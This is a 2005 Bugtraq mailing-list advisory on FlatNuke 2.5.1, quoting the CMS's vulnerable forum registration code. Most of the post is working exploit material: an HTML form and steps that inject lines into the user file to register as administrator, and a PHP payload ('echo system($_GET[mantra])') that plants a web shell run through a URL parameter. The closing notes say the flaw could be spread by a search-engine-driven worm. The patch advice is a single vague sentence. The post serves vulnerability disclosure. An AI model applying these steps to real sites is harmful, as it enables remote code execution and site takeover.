Bugtraq mailing list archives

Multiple Vulnerabilities in FlatNuke


From: Pierquinto Manco <pierquinto () gmail com>
Date: 2 Jan 2005 23:14:35 -0000



*************************************************************
* CODEBUG Labs
* Advisory #6
* Title: Multiple Vulnerabilities in Flat-nuke
* Author: Pierquinto 'Mantra' Manco
* English Version: David 'hanska' Paleino
* Product: Flat-Nuke 2.5.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org
*
**************************************************************

-) Software Page (www.flatnuke.org)
"FlatNuke is a CMS (Content Management System) which doesn't use any DBMS, in favour of text files only (from this fact 
comes its name). The last stable version of FlatNuke is 2.5.1."

-) The vulnerable function
The vulnerability stays in the index.php file in flatnuke's forum/ directory, which is located in the scripts' main 
directory:

<?
    if(!file_exists("users/$nome.php")) {
        if(($nome == "") || ($regpass == "") || (stristr($nome, "")) || (strlen($nome) > 13) || (stristr($nome,"\"")) 
|| (stristr($nome, "\\")) || ($regpass != $reregpass)){
                print _FERRCAMPO . "<br><a href=\"javascript:history.back()\">&lt;&lt;" . _INDIETRO . "</a>";
    }
    else {
        $nome = str_replace("<", "", $nome);
        $nome = str_replace(">", "", $nome);
        $nome = stripslashes($nome);
        $regpass = str_replace("<", "", $regpass);
        $regpass = str_replace(">", "", $regpass);
        $anag = str_replace(">", "", $anag);
        $anag = str_replace("<", "", $anag);
        $anag = stripslashes($anag);
        $email = str_replace("<", "", $email);
        $email = str_replace(">", "", $email);
        $email = stripslashes($email);
        $homep = str_replace("<", "", $homep);
        $homep = str_replace(">", "", $homep);
        $homep = stripslashes($homep);
        $prof = str_replace("<", "", $prof);
        $prof = str_replace(">", "", $prof);
        $prof = stripslashes($prof);
        $prov = str_replace("<", "", $prov);
        $prov = str_replace(">", "", $prov);
        $prov = stripslashes($prov);
        $ava = str_replace("<", "", $ava);
        $ava = str_replace(">", "", $ava);
        if ($ava == "")
                $ava="blank.png";

        if ($url_avatar != "") {
                $ava = $url_avatar;
                $ava = str_replace("<", "", $ava);
                $ava = str_replace(">", "", $ava);
        }
        else {
                $ava = str_replace("<", "", $ava);
                $ava = str_replace(">", "", $ava);
                $ava = "images/" . $ava;
        }

        $firma = str_replace("<", "", $firma);
        $firma = str_replace(">", "", $firma);
        $firma = stripslashes($firma);

        # Stores the password in a MD5 hash.
        $regpass = md5($regpass);

    
        $firma = str_replace("\n", "<br>", $firma);
        $fp = fopen("users/$nome.php", "w");
        // these fwrite() don't need any concurrent
        // access check since the user can only access
        // his own file
        fwrite($fp, "<?\n");
        fwrite($fp, "#$regpass\n");

        fwrite($fp, "#$anag\n");
        fwrite($fp, "#$email\n");
        fwrite($fp, "#$homep\n");
        fwrite($fp, "#$prof\n");
        fwrite($fp, "#$prov\n");
        fwrite($fp, "#$ava\n");
        fwrite($fp, "#$firma\n");
        fwrite($fp, "#$level\n");
        fwrite($fp, "?>\n");
        fclose($fp);
        ...
?>

- - ) Remote Privilege Escalation
Make a HTML page with the following code:

<form action="http://www.sitewithflatnuke.org/forum/index.php"; method=post name="registra">
        <input type=hidden name=op value=reg>
        Username*: <input name=nome><br>    
        Password*: <input name="regpass" type="password"><br>
        Password*: <input name="reregpass" type="password"><br>
        Name: <input name=anag><br>
        E-mail: <input name=email><br>
        Homepage: <input name=homep value="http://";><br>
        Job: <input name=prof><br>
        Country: <input name=prov><br>
        <select name="ava">
                <option value="">----</option>
                <option value="blank.png">blank.png</option>
        </select>
        <br><br>
        Or remote image URL:<br><br>
        <textarea name="url_avatar" rows=5 cols=23></textarea>
        <br>
        Signature: <textarea name=firma rows=5 cols=23></textarea>
        <center>
                <input type=submit value="Send">
        </center>
</form>

Once you open the HTML page in ANY web browser, you need to fill in every field but the one called url_avatar, which we 
will use to register ourselves as administrators.
In the "url_avatar" field, press Enter at least twice, then write #10, this way we will make directives registering us 
as administrators precede that ones which would register us as normal users.
All this is possible because the script, in the registration function, does not check the values contained in the text 
fields that we have opportunely changed into textarea fields.


- - ) PHP Code Injection
This bug came into evidence while I was writing about the Remote Privilege Escalation:

<form action="http://www.sitewithflatnuke.org/forum/index.php"; method=post name="registra">
        <input type=hidden name=op value=reg>
        Username*: <input name=nome><br>    
        Password*: <input name="regpass" type="password"><br>
        Password*: <input name="reregpass" type="password"><br>
        Name: <input name=anag><br>
        E-mail: <input name=email><br>
        Homepage: <input name=homep value="http://";><br>
        Job: <input name=prof><br>
        Country: <input name=prov><br>
        <select name="ava">
                <option value="">----</option>
                <option value="blank.png">blank.png</option>
        </select>
        <br><br>
        Or remote image URL:<br><br>
        <textarea name="url_avatar" rows=5 cols=23></textarea>
        <br>
        Signature:
        <textarea name=firma rows=5 cols=23></textarea>
        <center>
                <input type=submit value="Send">
        </center>
</form>


Let's open again our HTML page from a browser and just fill in the fields like we did for the Remote Privilege 
Escalation bug. We will now use our "url_avatar" textarea to inject malicious code.
At this point, press Enter at least once and put out malicious PHP code, for example:

        echo system($_GET[mantra]);

This command, for example, will give us a shell accessible from:
        
        http://www.sitewithflatnuke.org/forum/users/$yourforumnickname.php?mantra=command_to_execute

- ) Patch
To correct these vulnerabilities some further parameters-checking should be implemented, and the users registration and 
mantainance system should be restructured.

-) Notes
Through the use of Google or any other kind of search engine it is possible to create a worm, like Santy for phpBB, and 
spread it over each system running FlatNuke, with a high probability of causing damages.

*****************************************************************
        http://www.codebug.org
*****************************************************************


Current thread: